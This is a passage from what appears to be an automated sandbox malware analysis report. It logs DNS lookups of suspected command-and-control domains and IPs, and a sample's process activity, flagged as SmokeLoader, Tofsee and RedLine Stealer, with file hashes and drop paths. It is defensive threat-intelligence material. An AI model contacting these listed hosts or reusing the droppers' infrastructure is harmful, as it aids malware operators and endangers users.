Jan 4, 2022 19:33:42.689954042 CET | 8.8.8.8 | 192.168.2.5 | 0xdb32 | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:42.895642042 CET | 8.8.8.8 | 192.168.2.5 | 0xda5b | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:43.105460882 CET | 8.8.8.8 | 192.168.2.5 | 0xace2 | No error (0) | goo.su | 172.67.139.105 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:43.105460882 CET | 8.8.8.8 | 192.168.2.5 | 0xace2 | No error (0) | goo.su | 104.21.38.221 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:43.549119949 CET | 8.8.8.8 | 192.168.2.5 | 0xe291 | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:43.774574041 CET | 8.8.8.8 | 192.168.2.5 | 0xbe44 | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:43.963344097 CET | 8.8.8.8 | 192.168.2.5 | 0x50d2 | No error (0) | transfer.sh | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:44.144305944 CET | 8.8.8.8 | 192.168.2.5 | 0xfbff | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:44.378165007 CET | 8.8.8.8 | 192.168.2.5 | 0xb809 | No error (0) | transfer.sh | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:46.598094940 CET | 8.8.8.8 | 192.168.2.5 | 0xfe7d | No error (0) | amogohuigotuli.at | 189.129.105.161 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:46.598094940 CET | 8.8.8.8 | 192.168.2.5 | 0xfe7d | No error (0) | amogohuigotuli.at | 61.98.7.132 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:46.598094940 CET | 8.8.8.8 | 192.168.2.5 | 0xfe7d | No error (0) | amogohuigotuli.at | 175.126.109.15 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:46.598094940 CET | 8.8.8.8 | 192.168.2.5 | 0xfe7d | No error (0) | amogohuigotuli.at | 61.98.7.133 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:46.598094940 CET | 8.8.8.8 | 192.168.2.5 | 0xfe7d | No error (0) | amogohuigotuli.at | 151.251.30.69 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:46.598094940 CET | 8.8.8.8 | 192.168.2.5 | 0xfe7d | No error (0) | amogohuigotuli.at | 152.0.118.227 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:46.598094940 CET | 8.8.8.8 | 192.168.2.5 | 0xfe7d | No error (0) | amogohuigotuli.at | 187.156.124.76 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:46.598094940 CET | 8.8.8.8 | 192.168.2.5 | 0xfe7d | No error (0) | amogohuigotuli.at | 197.44.54.172 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:46.598094940 CET | 8.8.8.8 | 192.168.2.5 | 0xfe7d | No error (0) | amogohuigotuli.at | 110.14.121.125 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:46.598094940 CET | 8.8.8.8 | 192.168.2.5 | 0xfe7d | No error (0) | amogohuigotuli.at | 211.40.39.251 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:47.917447090 CET | 8.8.8.8 | 192.168.2.5 | 0xbcb0 | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:47.917687893 CET | 8.8.8.8 | 192.168.2.5 | 0x75bd | No error (0) | amogohuigotuli.at | 151.251.30.69 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:47.917687893 CET | 8.8.8.8 | 192.168.2.5 | 0x75bd | No error (0) | amogohuigotuli.at | 152.0.118.227 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:47.917687893 CET | 8.8.8.8 | 192.168.2.5 | 0x75bd | No error (0) | amogohuigotuli.at | 187.156.124.76 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:47.917687893 CET | 8.8.8.8 | 192.168.2.5 | 0x75bd | No error (0) | amogohuigotuli.at | 197.44.54.172 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:47.917687893 CET | 8.8.8.8 | 192.168.2.5 | 0x75bd | No error (0) | amogohuigotuli.at | 110.14.121.125 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:47.917687893 CET | 8.8.8.8 | 192.168.2.5 | 0x75bd | No error (0) | amogohuigotuli.at | 211.40.39.251 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:47.917687893 CET | 8.8.8.8 | 192.168.2.5 | 0x75bd | No error (0) | amogohuigotuli.at | 189.129.105.161 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:47.917687893 CET | 8.8.8.8 | 192.168.2.5 | 0x75bd | No error (0) | amogohuigotuli.at | 61.98.7.132 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:47.917687893 CET | 8.8.8.8 | 192.168.2.5 | 0x75bd | No error (0) | amogohuigotuli.at | 175.126.109.15 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:47.917687893 CET | 8.8.8.8 | 192.168.2.5 | 0x75bd | No error (0) | amogohuigotuli.at | 61.98.7.133 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:48.173059940 CET | 8.8.8.8 | 192.168.2.5 | 0xe695 | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:48.355176926 CET | 8.8.8.8 | 192.168.2.5 | 0xe22 | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:48.546367884 CET | 8.8.8.8 | 192.168.2.5 | 0xf446 | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:48.801156044 CET | 8.8.8.8 | 192.168.2.5 | 0xe2bc | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:49.633609056 CET | 8.8.8.8 | 192.168.2.5 | 0xf5c2 | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:50.536936998 CET | 8.8.8.8 | 192.168.2.5 | 0x229b | No error (0) | f0616068.xsph.ru | 141.8.193.236 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:54.859932899 CET | 8.8.8.8 | 192.168.2.5 | 0x552e | No error (0) | amogohuigotuli.at | 189.129.105.161 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:54.859932899 CET | 8.8.8.8 | 192.168.2.5 | 0x552e | No error (0) | amogohuigotuli.at | 61.98.7.132 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:54.859932899 CET | 8.8.8.8 | 192.168.2.5 | 0x552e | No error (0) | amogohuigotuli.at | 175.126.109.15 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:54.859932899 CET | 8.8.8.8 | 192.168.2.5 | 0x552e | No error (0) | amogohuigotuli.at | 61.98.7.133 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:54.859932899 CET | 8.8.8.8 | 192.168.2.5 | 0x552e | No error (0) | amogohuigotuli.at | 151.251.30.69 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:54.859932899 CET | 8.8.8.8 | 192.168.2.5 | 0x552e | No error (0) | amogohuigotuli.at | 152.0.118.227 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:54.859932899 CET | 8.8.8.8 | 192.168.2.5 | 0x552e | No error (0) | amogohuigotuli.at | 187.156.124.76 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:54.859932899 CET | 8.8.8.8 | 192.168.2.5 | 0x552e | No error (0) | amogohuigotuli.at | 197.44.54.172 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:54.859932899 CET | 8.8.8.8 | 192.168.2.5 | 0x552e | No error (0) | amogohuigotuli.at | 110.14.121.125 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:54.859932899 CET | 8.8.8.8 | 192.168.2.5 | 0x552e | No error (0) | amogohuigotuli.at | 211.40.39.251 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:54.861382008 CET | 8.8.8.8 | 192.168.2.5 | 0x20b7 | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.048371077 CET | 8.8.8.8 | 192.168.2.5 | 0x7863 | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.254973888 CET | 8.8.8.8 | 192.168.2.5 | 0x5562 | No error (0) | vk.com | 87.240.190.72 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.254973888 CET | 8.8.8.8 | 192.168.2.5 | 0x5562 | No error (0) | vk.com | 87.240.190.78 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.254973888 CET | 8.8.8.8 | 192.168.2.5 | 0x5562 | No error (0) | vk.com | 93.186.225.208 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.254973888 CET | 8.8.8.8 | 192.168.2.5 | 0x5562 | No error (0) | vk.com | 87.240.139.194 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.254973888 CET | 8.8.8.8 | 192.168.2.5 | 0x5562 | No error (0) | vk.com | 87.240.137.158 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.254973888 CET | 8.8.8.8 | 192.168.2.5 | 0x5562 | No error (0) | vk.com | 87.240.190.67 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.895823956 CET | 8.8.8.8 | 192.168.2.5 | 0x6dd4 | No error (0) | amogohuigotuli.at | 151.251.30.69 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.895823956 CET | 8.8.8.8 | 192.168.2.5 | 0x6dd4 | No error (0) | amogohuigotuli.at | 152.0.118.227 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.895823956 CET | 8.8.8.8 | 192.168.2.5 | 0x6dd4 | No error (0) | amogohuigotuli.at | 187.156.124.76 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.895823956 CET | 8.8.8.8 | 192.168.2.5 | 0x6dd4 | No error (0) | amogohuigotuli.at | 197.44.54.172 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.895823956 CET | 8.8.8.8 | 192.168.2.5 | 0x6dd4 | No error (0) | amogohuigotuli.at | 110.14.121.125 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.895823956 CET | 8.8.8.8 | 192.168.2.5 | 0x6dd4 | No error (0) | amogohuigotuli.at | 211.40.39.251 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.895823956 CET | 8.8.8.8 | 192.168.2.5 | 0x6dd4 | No error (0) | amogohuigotuli.at | 189.129.105.161 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.895823956 CET | 8.8.8.8 | 192.168.2.5 | 0x6dd4 | No error (0) | amogohuigotuli.at | 61.98.7.132 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.895823956 CET | 8.8.8.8 | 192.168.2.5 | 0x6dd4 | No error (0) | amogohuigotuli.at | 175.126.109.15 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.895823956 CET | 8.8.8.8 | 192.168.2.5 | 0x6dd4 | No error (0) | amogohuigotuli.at | 61.98.7.133 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:55.909377098 CET | 8.8.8.8 | 192.168.2.5 | 0xb791 | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:56.112481117 CET | 8.8.8.8 | 192.168.2.5 | 0xb3a8 | No error (0) | natribu.org | 178.248.232.78 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:56.378345013 CET | 8.8.8.8 | 192.168.2.5 | 0x463 | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:56.710943937 CET | 8.8.8.8 | 192.168.2.5 | 0xeeb3 | No error (0) | natribu.org | 178.248.232.78 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:56.901292086 CET | 8.8.8.8 | 192.168.2.5 | 0x6c1f | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:57.376915932 CET | 8.8.8.8 | 192.168.2.5 | 0xd80f | No error (0) | data-host-coin-8.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:57.669960976 CET | 8.8.8.8 | 192.168.2.5 | 0x77fa | No error (0) | mstdn.social | 116.202.14.219 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:58.163434982 CET | 8.8.8.8 | 192.168.2.5 | 0x9f39 | No error (0) | qoto.org | 51.91.13.105 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:58.680798054 CET | 8.8.8.8 | 192.168.2.5 | 0x21ac | No error (0) | amogohuigotuli.at | 152.0.118.227 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:58.680798054 CET | 8.8.8.8 | 192.168.2.5 | 0x21ac | No error (0) | amogohuigotuli.at | 187.156.124.76 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:58.680798054 CET | 8.8.8.8 | 192.168.2.5 | 0x21ac | No error (0) | amogohuigotuli.at | 197.44.54.172 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:58.680798054 CET | 8.8.8.8 | 192.168.2.5 | 0x21ac | No error (0) | amogohuigotuli.at | 110.14.121.125 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:58.680798054 CET | 8.8.8.8 | 192.168.2.5 | 0x21ac | No error (0) | amogohuigotuli.at | 211.40.39.251 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:58.680798054 CET | 8.8.8.8 | 192.168.2.5 | 0x21ac | No error (0) | amogohuigotuli.at | 189.129.105.161 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:58.680798054 CET | 8.8.8.8 | 192.168.2.5 | 0x21ac | No error (0) | amogohuigotuli.at | 61.98.7.132 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:58.680798054 CET | 8.8.8.8 | 192.168.2.5 | 0x21ac | No error (0) | amogohuigotuli.at | 175.126.109.15 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:58.680798054 CET | 8.8.8.8 | 192.168.2.5 | 0x21ac | No error (0) | amogohuigotuli.at | 61.98.7.133 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:58.680798054 CET | 8.8.8.8 | 192.168.2.5 | 0x21ac | No error (0) | amogohuigotuli.at | 151.251.30.69 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:01.027271986 CET | 8.8.8.8 | 192.168.2.5 | 0x38e7 | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:02.271924019 CET | 8.8.8.8 | 192.168.2.5 | 0xcf58 | No error (0) | amogohuigotuli.at | 151.251.30.69 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:02.271924019 CET | 8.8.8.8 | 192.168.2.5 | 0xcf58 | No error (0) | amogohuigotuli.at | 152.0.118.227 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:02.271924019 CET | 8.8.8.8 | 192.168.2.5 | 0xcf58 | No error (0) | amogohuigotuli.at | 187.156.124.76 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:02.271924019 CET | 8.8.8.8 | 192.168.2.5 | 0xcf58 | No error (0) | amogohuigotuli.at | 197.44.54.172 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:02.271924019 CET | 8.8.8.8 | 192.168.2.5 | 0xcf58 | No error (0) | amogohuigotuli.at | 110.14.121.125 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:02.271924019 CET | 8.8.8.8 | 192.168.2.5 | 0xcf58 | No error (0) | amogohuigotuli.at | 211.40.39.251 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:02.271924019 CET | 8.8.8.8 | 192.168.2.5 | 0xcf58 | No error (0) | amogohuigotuli.at | 189.129.105.161 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:02.271924019 CET | 8.8.8.8 | 192.168.2.5 | 0xcf58 | No error (0) | amogohuigotuli.at | 61.98.7.132 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:02.271924019 CET | 8.8.8.8 | 192.168.2.5 | 0xcf58 | No error (0) | amogohuigotuli.at | 175.126.109.15 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:02.271924019 CET | 8.8.8.8 | 192.168.2.5 | 0xcf58 | No error (0) | amogohuigotuli.at | 61.98.7.133 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:02.645013094 CET | 8.8.8.8 | 192.168.2.5 | 0x99 | No error (0) | patmushta.info | 194.87.235.183 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:13.969244003 CET | 8.8.8.8 | 192.168.2.5 | 0x644d | No error (0) | microsoft-com.mail.protection.outlook.com | 104.47.53.36 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:13.969244003 CET | 8.8.8.8 | 192.168.2.5 | 0x644d | No error (0) | microsoft-com.mail.protection.outlook.com | 40.93.207.0 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:13.969244003 CET | 8.8.8.8 | 192.168.2.5 | 0x644d | No error (0) | microsoft-com.mail.protection.outlook.com | 40.93.212.0 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:13.969244003 CET | 8.8.8.8 | 192.168.2.5 | 0x644d | No error (0) | microsoft-com.mail.protection.outlook.com | 40.93.207.1 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:13.969244003 CET | 8.8.8.8 | 192.168.2.5 | 0x644d | No error (0) | microsoft-com.mail.protection.outlook.com | 52.101.24.0 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:13.969244003 CET | 8.8.8.8 | 192.168.2.5 | 0x644d | No error (0) | microsoft-com.mail.protection.outlook.com | 104.47.54.36 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:15.665023088 CET | 8.8.8.8 | 192.168.2.5 | 0xfa2c | No error (0) | f0616071.xsph.ru | 141.8.193.236 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:18.436789989 CET | 8.8.8.8 | 192.168.2.5 | 0x635b | No error (0) | f0616073.xsph.ru | 141.8.193.236 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:26.044899940 CET | 8.8.8.8 | 192.168.2.5 | 0xc663 | No error (0) | kent0mushinec0n3t.casacam.net | 95.143.179.186 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:34:53.007128000 CET | 8.8.8.8 | 192.168.2.5 | 0x6309 | No error (0) | patmushta.info | 194.87.235.183 | A (IP address) | IN (0x0001)

                                                                                                                                                                                                        HTTP Request Dependency Graph


                                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:03
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\nkINykHreE.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\nkINykHreE.exe"
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:343040 bytes
                                                                                                                                                                                                        MD5 hash:DC67C627917FF9724F3C1E6DB5F2DC27
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:05
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\nkINykHreE.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\nkINykHreE.exe"
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:343040 bytes
                                                                                                                                                                                                        MD5 hash:DC67C627917FF9724F3C1E6DB5F2DC27
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.297306514.0000000000580000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.297326406.00000000005A1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:11
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                        Imagebase:0x7ff693d90000
                                                                                                                                                                                                        File size:3933184 bytes
                                                                                                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000000.282842442.0000000003A61000.00000020.00020000.sdmp, Author: Joe Security
Reputation: high

General

Start time: 19:32:13
Start date: 04/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:32:23
Start date: 04/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:32:24
Start date: 04/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:32:24
Start date: 04/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:32:25
Start date: 04/01/2022
Path: C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\SgrmBroker.exe
Imagebase: 0x7ff797770000
File size: 163336 bytes
MD5 hash: D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:32:26
Start date: 04/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:32:47
Start date: 04/01/2022
Path: C:\Users\user\AppData\Roaming\haifbcd
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\haifbcd
Imagebase: 0x400000
File size: 343040 bytes
MD5 hash: DC67C627917FF9724F3C1E6DB5F2DC27
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 19:32:47
Start date: 04/01/2022
Path: C:\Users\user\AppData\Local\Temp\115B.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\115B.exe
Imagebase: 0x400000
File size: 343040 bytes
MD5 hash: DC67C627917FF9724F3C1E6DB5F2DC27
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 19:32:49
Start date: 04/01/2022
Path: C:\Users\user\AppData\Roaming\haifbcd
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\haifbcd
Imagebase: 0x400000
File size: 343040 bytes
MD5 hash: DC67C627917FF9724F3C1E6DB5F2DC27
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.352429754.0000000002091000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.352266837.00000000005C0000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 19:32:50
Start date: 04/01/2022
Path: C:\Users\user\AppData\Local\Temp\115B.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\115B.exe
Imagebase: 0x400000
File size: 343040 bytes
MD5 hash: DC67C627917FF9724F3C1E6DB5F2DC27
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 19:32:57
Start date: 04/01/2022
Path: C:\Users\user\AppData\Local\Temp\2997.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\2997.exe
Imagebase: 0x400000
File size: 358912 bytes
MD5 hash: 1F935BFFF0F8128972BC69625E5B2A6C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.370053936.0000000000751000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.370019662.0000000000620000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:02
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\18D.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\18D.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:342528 bytes
                                                                                                                                                                                                        MD5 hash:B7B184D2B0910148CABB9B5E915753D6
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000012.00000002.390911110.0000000000540000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000012.00000002.390725871.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000012.00000003.369452134.0000000000560000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:05
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\CBA.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\CBA.exe
                                                                                                                                                                                                        Imagebase:0xcb0000
                                                                                                                                                                                                        File size:539136 bytes
                                                                                                                                                                                                        MD5 hash:6C72997AA5DD44A44B27BD36347BAED9
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000002.408243360.0000000004121000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:08
                                                                                                                                                                                                        Start date:04/01/2022
